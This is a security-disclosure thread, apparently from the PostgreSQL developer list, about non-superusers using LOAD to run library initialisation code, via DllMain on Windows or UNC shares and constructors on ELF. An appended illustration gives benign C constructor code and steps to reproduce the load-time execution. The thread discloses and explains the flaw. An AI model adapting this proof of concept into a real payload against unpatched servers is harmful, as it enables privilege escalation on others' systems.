Privilege escalation via LOAD
Hi guys,
It appears that low privileged users can invoke the LOAD extension to load
arbitrary libraries into the postgres process space. On Windows systems
this is achieved by calling LoadLibrary
(src/backend/port/dynloader/win32.c). The effect of this is that DllMain
will be executed. Since LOAD takes an absolute path, UNC paths may be
used on Windows, thus a low privileged database user can load an arbitrary
library from an anonymous share they have set up, escalating to the
privileges of the database user. I am still investigating the impact on
Unix.
Cheers
John
(this vulnerability was born out of a discussion on #postgresql
between myself, lurka and dennisb).
John Heasman <john@ngssoftware.com> writes:
> It appears that low privileged users can invoke the LOAD extension to load
> arbitrary libraries into the postgres process space.
Hmm. Creating C functions is restricted to superusers, but I guess no
one ever noticed that LOAD isn't. On a platform where that can execute
initialization functions this does seem like a security issue.
regards, tom lane
Tom Lane wrote:
> John Heasman <john@ngssoftware.com> writes:
>> It appears that low privileged users can invoke the LOAD extension
>> to load arbitrary libraries into the postgres process space.
>
> Hmm. Creating C functions is restricted to superusers, but I guess
> no one ever noticed that LOAD isn't. On a platform where that can
> execute initialization functions this does seem like a security
> issue.
I believe all ELF platforms fall into that category.
--
Peter Eisentraut
http://developer.postgresql.org/~petere/
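The following is an added illustration, not code from the thread or from PostgreSQL itself. It shows the mechanism John describes for Windows (DllMain running as a side effect of LoadLibrary) in its ELF form, which is what Peter's remark refers to: a function placed in the object's constructor section runs at the moment the dynamic loader maps the library, with no exported symbol ever being called. Built as a shared object and handed to LOAD on a server that lets non-superusers run it, such a routine executes inside the backend with the server's OS privileges. The function names and the recorded message are chosen here for illustration.

```c
/* Added example (not from the thread): an ELF constructor that runs as soon
 * as the object is loaded, before any caller invokes a function from it.
 * This is the Unix analogue of DllMain running after LoadLibrary. */
#include <stdio.h>
#include <string.h>

/* State written by the constructor, so the effect can be observed. */
static int  init_ran = 0;
static char init_note[64];

/* GCC/Clang extension: places on_load() in .init_array, so the dynamic loader
 * calls it during dlopen() of a shared object (or before main() when linked
 * directly into an executable, as in this stand-alone build). */
__attribute__((constructor))
static void on_load(void)
{
    init_ran = 1;
    /* Hypothetical payload stand-in: just record that we ran. */
    strncpy(init_note, "constructor executed at load time", sizeof init_note - 1);
    init_note[sizeof init_note - 1] = '\0';
}

/* Query helpers so a caller can confirm the constructor ran even though
 * nothing in the program ever called on_load() explicitly. */
int constructor_has_run(void)
{
    return init_ran;
}

const char *constructor_note(void)
{
    return init_note;
}

int main(void)
{
    /* Nothing here calls on_load(); by the time main() runs it is done. */
    printf("constructor ran before main: %s\n",
           constructor_has_run() ? "yes" : "no");
    printf("%s\n", constructor_note());
    return constructor_has_run() ? 0 : 1;
}
```

To reproduce the load-time behaviour against a database rather than as a stand-alone program, compile the same source without main() as a shared object (for example `gcc -shared -fPIC -o on_load.so on_load.c`), connect as a non-superuser and issue `LOAD '/absolute/path/on_load.so'`. On a server that still permits LOAD for ordinary users the constructor runs inside the backend; the check a DBA wants is that the statement is refused for non-superusers, which later PostgreSQL releases enforce.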